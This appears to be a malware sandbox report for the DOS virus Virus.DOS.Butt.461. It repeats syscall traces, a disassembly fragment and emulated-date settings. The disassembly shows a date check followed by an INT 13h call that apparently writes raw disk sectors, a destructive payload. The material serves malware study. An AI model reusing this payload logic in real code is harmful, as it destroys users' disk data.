Sample viewer

vx.netlux.org/Virus.DOS.Butt.461

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:48:11.066453981Z	68	PC: 12a66 \| I/O control for devices (Set for = 'Í ÀŸ')
2018-12-17T22:48:11.068143698Z	42	PC: 12acf \| Get date 0x12acf: cmp al, 5 0x12ad1: je 0x12ae3 0x12ad3: pop es 0x12ad4: pop ds 0x12ad5: mov di, 0x100 0x12ad8: lea si, word ptr [bp + 0xa0] 0x12adc: push di 0x12add: movsw word ptr es:[di], word ptr [si] 0x12ade: movsb byte ptr es:[di], byte ptr [si] 0x12adf: ret 0x12ae0: int 0x20 0x12ae2: add byte ptr [bp + si + 0x80], bh 0x12ae6: mov cx, 1 0x12ae9: mov ax, 0x380 0x12aec: xor bx, bx 0x12aee: mov es, bx 0x12af0: int 0x13 0x12af2: jmp 0x12ad3 0x12af4: inc dx 0x12af5: jne 0x12b4b

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:13.236851857Z	68	PC: 12a66 \| I/O control for devices (Set for = 'Í ÀŸ')
2018-12-25T12:23:13.238763901Z	42	PC: 12acf \| Get date 0x12acf: cmp al, 5 0x12ad1: je 0x12ae3 0x12ad3: pop es 0x12ad4: pop ds 0x12ad5: mov di, 0x100 0x12ad8: lea si, word ptr [bp + 0xa0] 0x12adc: push di 0x12add: movsw word ptr es:[di], word ptr [si] 0x12ade: movsb byte ptr es:[di], byte ptr [si] 0x12adf: ret 0x12ae0: int 0x20 0x12ae2: add byte ptr [bp + si + 0x80], bh 0x12ae6: mov cx, 1 0x12ae9: mov ax, 0x380 0x12aec: xor bx, bx 0x12aee: mov es, bx 0x12af0: int 0x13 0x12af2: jmp 0x12ad3 0x12af4: inc dx 0x12af5: jne 0x12b4b

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:13.354244574Z	68	PC: 12a66 \| I/O control for devices (Set for = 'Í ÀŸ')
2018-12-25T12:23:13.356961545Z	42	PC: 12acf \| Get date 0x12acf: cmp al, 5 0x12ad1: je 0x12ae3 0x12ad3: pop es 0x12ad4: pop ds 0x12ad5: mov di, 0x100 0x12ad8: lea si, word ptr [bp + 0xa0] 0x12adc: push di 0x12add: movsw word ptr es:[di], word ptr [si] 0x12ade: movsb byte ptr es:[di], byte ptr [si] 0x12adf: ret 0x12ae0: int 0x20 0x12ae2: add byte ptr [bp + si + 0x80], bh 0x12ae6: mov cx, 1 0x12ae9: mov ax, 0x380 0x12aec: xor bx, bx 0x12aee: mov es, bx 0x12af0: int 0x13 0x12af2: jmp 0x12ad3 0x12af4: inc dx 0x12af5: jne 0x12b4b

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:13.37343819Z	68	PC: 12a66 \| I/O control for devices (Set for = 'Í ÀŸ')
2018-12-25T12:23:13.375044771Z	42	PC: 12acf \| Get date 0x12acf: cmp al, 5 0x12ad1: je 0x12ae3 0x12ad3: pop es 0x12ad4: pop ds 0x12ad5: mov di, 0x100 0x12ad8: lea si, word ptr [bp + 0xa0] 0x12adc: push di 0x12add: movsw word ptr es:[di], word ptr [si] 0x12ade: movsb byte ptr es:[di], byte ptr [si] 0x12adf: ret 0x12ae0: int 0x20 0x12ae2: add byte ptr [bp + si + 0x80], bh 0x12ae6: mov cx, 1 0x12ae9: mov ax, 0x380 0x12aec: xor bx, bx 0x12aee: mov es, bx 0x12af0: int 0x13 0x12af2: jmp 0x12ad3 0x12af4: inc dx 0x12af5: jne 0x12b4b

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:13.47044873Z	68	PC: 12a66 \| I/O control for devices (Set for = 'Í ÀŸ')
2018-12-25T12:23:13.472997626Z	42	PC: 12acf \| Get date 0x12acf: cmp al, 5 0x12ad1: je 0x12ae3 0x12ad3: pop es 0x12ad4: pop ds 0x12ad5: mov di, 0x100 0x12ad8: lea si, word ptr [bp + 0xa0] 0x12adc: push di 0x12add: movsw word ptr es:[di], word ptr [si] 0x12ade: movsb byte ptr es:[di], byte ptr [si] 0x12adf: ret 0x12ae0: int 0x20 0x12ae2: add byte ptr [bp + si + 0x80], bh 0x12ae6: mov cx, 1 0x12ae9: mov ax, 0x380 0x12aec: xor bx, bx 0x12aee: mov es, bx 0x12af0: int 0x13 0x12af2: jmp 0x12ad3 0x12af4: inc dx 0x12af5: jne 0x12b4b